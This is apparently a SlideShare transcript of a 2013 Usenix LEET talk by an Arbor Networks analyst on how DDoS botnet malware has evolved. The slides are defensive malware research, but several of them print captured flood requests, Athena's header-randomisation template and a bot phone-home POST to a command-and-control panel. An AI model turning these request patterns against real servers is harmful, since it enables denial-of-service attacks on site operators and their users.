Advancements in DDoS Malware

  • 1,345 views
Uploaded on

This presentation explores advancements in DDoS Malware, based on research from Arbor Networks' ASERT security analyst Jason Jones. This presentation was originally shared at Usenix LEET '13.

This presentation explores advancements in DDoS Malware, based on research from Arbor Networks' ASERT security analyst Jason Jones. This presentation was originally shared at Usenix LEET '13.

More in: Technology , Education
  • Full Name Full Name Comment goes here.
    Are you sure you want to
    Your message goes here
    Be the first to comment
No Downloads

Views

Total Views
1,345
On Slideshare
0
From Embeds
0
Number of Embeds
2

Actions

Shares
Downloads
24
Comments
0
Likes
1

Embeds 0

No embeds

Report content

Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

Cancel
    No notes for slide

Transcript

  • 1. Recent Advancements in DDoS Malware Jason Jones Usenix LEET13
  • 2. 2   Agenda • Who am I? • Why? • What Hasn’t Changed • What Has Changed – Better Blending In & Hiding – Better Botnet Building – Better protection • Trends and Takeaways
  • 3. 3   Who am I? • Jason Jones –  Security Research Analyst on Arbor Networks’ ASERT –  Presented at •  BlackHat USA 2012 •  InfoSec Southwest 2013 –  Research interests • IP reputation • Malware clustering • Data mining • Graph Theory / Combinatorics
  • 4. 4   ASERT Malware Corral • Arbor Security Engineering & Response Team • ASERT Malware Corral – Malware storage + processing system – Processing occurs via sandbox, static methods – Tagging via behavioral and static methods • Currently pulling in upwards of 100k samples / day • 567 Unique family names tagged last year – Includes DDoS, Bankers, Infostealers, APT, etc.
  • 5. 5   Why? • DDoS Becoming More of a Threat – SpamHaus – “Triple Crown” – Political Motivations – Anon Ops – Ransom • DDoS-specific Malware Evolving In Response to Our Response
  • 6. What Hasn’t Changed
  • 7. 7   Still the same… • Most Malware Include –  Basic GET/POST Flood –  SYN and/or Connection Flood –  UDP Flood • Lots of IRC CnC Still Around • Many use hard-coded set of user-agents • Still broken –  Slowloris –  ARME
  • 8. 8   Still the same… (cont.) • .NET malware is still terrible –  Most decompiles fine in .NET Reflector –  Use .NET HTTP methods –  Looks mostly the same for DDoS • Gh0st RAT variants still popular • Most are not fully protocol aware • Many don’t do SSL / HTTPS • Copy + Paste still prevalent
  • 9. What Has Changed
  • 10. 10   Better Blending In & Hiding on the Network • HTTP CnC has always been popular –  Tended to be plaintext –  Athena recently moved from IRC -> HTTP • Obfuscates commands • Example: –  a=%5A%47%5A%33%62%57%4E%6F%63%33%42%30%63%6D%56%32%65%47%70%70%59%57%39%78%59%6E %56%73%5A%32%74%75%65%6E%6B%36%5A%58%64%79%64%48%46%75%65%58%42%69%5A%6E %68%76%59%32%74%70%5A%33%5A%71%5A%47%78%36%61%48%56%74%63%32%45%3D –  b=wHR5qGU6d25wZXnzY3c1gWQ6NGFuMWYsMtQ5OTE3ZDu0OTenMTu1MTQ5Yku4OWFzMTekZDY0wHBagXY6YW RbgW58YXJkgDp4ODZ8Z2VlZDpyYXB0d3B8Y29aZXM6MXcoqspXX1nQwHZzqkp2MS4rLkN8dtV0OkQlMHr%3D –  c=%67%6E%75%62%7A%7A%7A%78%68%66%6A%6D%69%65%6C%71%6C%70%70%6D%62%7A%75%6Ex –  Betabot employs encryption on phone-home • Adjustable phone-home intervals –  Specify long intervals to avoid suspicion
  • 11. 11   Better Blending In & Hiding on the Network (cont) • More Intelligent HTTP Attacks –  Requests look more legitimate now • Drive uses randomization in UA’s • Athena uses long list of legitimate UA’s –  More dynamic headers • Paradise borrowed from Armageddon2 –  Ability to specify POST parameters • Target search boxes, login forms, etc • Use up DB queries, server processing • Randomized per request, avoid caching
  • 12. 12   Example – DirtJumper Drive POST Attack POST /test HTTP/1.1 Host: 192.168.56.1:10000 User-Agent: Opera/9.80 (Windows NT 6.1; U; Edition Bangladesh Local; ru) Presto/2.10.289 Version/8.06 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.5,en;q=0.3 Connection: Keep-Alive Referer: http://192.168.56.1:10000/ Content-Length: 2443 Content-Type: application/x-www-form-urlencoded login=q1un7q002imn2843b4qqmk29fsfyk883592qzn4jdgsguc2vy7sqpoi4mlujelbn5levvck21g6j265b48g6f59mocvnzm76en 8rin3389c3epk3tgg89i4d796m85gt9hz0wjb4n19w00uh0m9t9xz8857506j08bj2a2r5203897du968e264456ci18b0d3flq2ka4a vq9j99e77d31pqcf668654e9xl74u3csa54ygcx45wbg67t47p2p326b00t4r2z99i07z9j2792c10f00l66dt5vnnf90z4xty7kpf1epb 1y5l34fwk0939y4c98hs9y856pqc0k03249rfzl640983e35cmw9i607d4zz1k9x3njz2r0v84624566zfoq4afc8c7ku8r31d37ad58 7cutfn4618476bnp822346s51sms408161jv7m69n2v5i1n4051t99uiru676596nao24j8dcse52a8dzdgcijz0khe0x7elf3w9c150 2tjto4332fszyl424g3b911vc1026g79604035lbvk8h31v78b845rqj630ndd42946s18l4832b36ukd2pb917yr60q16e444m36wa 9p2us9mj5b7ue4wv5e46m29l4ig8u9lf2wip8ogvv5q8eqj4rkw53k1fo277a3u1m5ca26xrv8fis4337z9p6wbp00u3jc2iq6i6f0rrr4 c379x66p0e2z3y57s4kekk370h9w986yd8m5f7l2as0m090v96x42i14qdci43e444h8815jp923545719y2u3b5n450e9c036ws 4643zvmp4663j8794w3h5yj71c324n12b3y96pi8487wv6z4xol0rkzq00jtpdgx05gidt8qt7ylyj36y40o2yzwh855x96ftw5qlagzpg 2um99u7rap89fca26xrn90015msjbb5417kq037ssje971j8s159g68j0o30agjr2h9zg&......... login=[1000]&pass=[1000]&password=[50]&log=[50]&passwrd=[50]&user=[50]&username=[50]&vb_login_usernam e=[50]&vb_login_md5password=[50]
  • 13. 13   Example – BlackRev GET /index.html HTTP/1.1 Host: victim.com Keep-Alive: 266 Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.22 (KHTML, like Gecko) Chrome/25.0.1364.172 Safari/537.22 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.6,en;q=0.4 Accept-Charset:twindows-1251,utf-8;q=0.7,*;q=0.3 Referer: http://victim.com/ Cookie:tPHPSESSID=t0gmf00id9bp4j9gvfsq87kq22; hotlog=1; __utma=226332163.1894789553.1362397126.1362926988.1363866277.4; __utmb=226332163.1.10.1363866277; __utmc=226332163; __utmz=226332163.1362397126.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
  • 14. 14   Athena IRC + HTTP HTTP Attack GET|POST|HEAD /<params> HTTP/1.1! Host: <target>! Range: bytes= <range bytes string>! Connection: Keep-alive | close! User-Agent: ObtainUserAgentString()! Cache-Control: no-cache | no-store | no-transform | only-if-cached | max-age=0 | public | private | max-stale! Vary: * | User-Agent! Accept: text/*, text/html, text/html;level=1, */* | */* | text/plain; q=0.5, text/html, text/x-dvi; q=0.8, text/x-c |text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/webp, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 | image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x- ms-xbap, application/x-shockwave-flash, application/msword, */* | * | application/ xml,application/xhtml+xml,text/html;q=0.9, text/plain;q=0.8,image/png,*/*;q=0.5 | text/ html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8! Accept-Charset: iso-8859-5, unicode-1-1;q=0.8 | * | UTF-8 | ISO-8859-1! Accept-Encoding: * | gzip, deflate | compress;q=0.5, gzip;q=1.0 | gzip;q=1.0, identity; q=0.5, *;q=0 | compress, gzip! Accept-Language: * | es | de | en-us,en;q=0.5 | en-us, en! Content-Type: application/x-www-form-urlencoded | text/html; charset=ISO-8859-4 | text/ html; charset=UTF-8 | application/xhtml+xml; charset=UTF-8 | image/gif! Content-Length: <length> ! X-a: b!
  • 15. 15   Example – Athena HTTP Phone Home POST /gate.php HTTP/1.1 Host: panel-gc.co.uk:69 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET CLR 2.0.50727) Content-Length: 436 a=%63%33%70%6e%62%58%52%68%62%6e%56%6f%62%32%4a%70%64%6d%4e%71%63%48%64%6b %63%58%68%72%63%6d%56%73%65%57%59%36%62%48%4e%6a%61%58%42%33%61%6e%46%6b %61%33%68%6c%65%57%5a%74%65%6d%64%30%59%57%35%6f%62%33%5a%69%63%6e%55%3d&c= %31%53%6a%52%31%4a%6e%6c%50%76%6d%73%52%6f%66%56%47%47%48%7a %77%53%51%6b&b=uHR5fGU6fiVgZWF0uHVzZDzgxilnMWdaNGFnx3zmYsbpOGnytXFgx3Q3ZXVdtjN2tXVjfG18fiFpOm M3uGJoX2pzxGnbZDkruGJoX2ZzxGVsOmJ8Yipuw2V5fsk0uGJ1f3h6ZiFlf2V8 •  |type:on_exec|uid:bac6cde8bbd9b242b7fa9f39b1198226f1a5|priv:admin|arch:x86|gend:laptop|cores:1|os:W_XP| ver:v1.0.3|net:4.0| •  |type:repeat|uid:bac6cde8bbd9b242b7fa9f39b1198226f1a5|ram:25|bk_killed:0|bk_files:0|bk_keys:0|busy:false|
  • 16. 16   Example – Paradise status=headers application/xml, image/png, text/html */*, text/html, text/html, application/xml text/x-dvi; q=.8; mxb=100000; mxt=5.0, text/x-c x-gzip, identity x-compress, x-zip, sdch x-compress ,deflate, gzip, x-gzip us-ua;q=0.5 az-us;q=0.9 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) NS8/0.9.6 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322) Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.0) Opera 7.02 Bork-edition [en] http://www.snpp.com/ http://ask.fm/FlOoRNOoBlE http://www.thesimpsons.com/ http://mylarha.deviantart.com/ http://www.thesimpsonslatino.com/
  • 17. 17   Building Better Botnets • Use What’s Readily Available –  “Triple Crown” financial attacks • Tiered CnC Structure • Dynamically update code with new attacks • Can easily adjust attacks if current attack is unsuccessful –  SpamHaus DNS Amplification • Open resolvers • Not botnet per se, but… • Highly successful
  • 18. 18   Better Protections • Store attacks in external DLL –  Paradise: Pulled down by main EXE –  DLL is crypted •  Restrict bots to geo regions –  Also blackholing connections •  Drop other malware on the same machine •  Previously mentioned obfuscating / encrypting phone- home •  More malware using encryption internal to binary •  More packers / obfuscations used
  • 19. 19   Better Protections (cont.) • More Junk Code • New Drive variant discards old phone home –  2-stage phone home –  Base64 + underlying protection –  3 new attacks –  Can now specify hard-coded or random Cookie vals –  Still reversing…. –  Blog soon?
  • 20. Trends and Takeaways 20  
  • 21. Trends and Takeaways •  DDoS becoming more of a feature of larger families –  Still plenty of standalone, but becoming more common in other malware •  DNS amplification will likely make its way into malware soon –  Too successful not to –  Too easy not to •  More booter services popping up –  Many Athena HTTP CnC hostnames appear to be booter backends •  Carberp source code leak will likely create a boom in carberp variants similar to ZeuS 21  
  • 22. More Trends and Takeways… • Traditional botnets with DDoS addons don’t DDOS much – DarkComet – Some Athena HTTP used to mostly drop other malware • Nitol, Betabot, Andromeda, ZeuS • Appear to be botnet-for-hire types • Still waiting for the first SPDY-aware malware J • Proper mobile DDoS botnet soon? 22  
  • 23. Questions/Comments/Feedback • jasonjones@arbor.net • @jasonljones 23   Thanks:  Arbor/ASERT,  Marc   Eisenbarth,  Alex  Bardas  
  • 24. Thank You!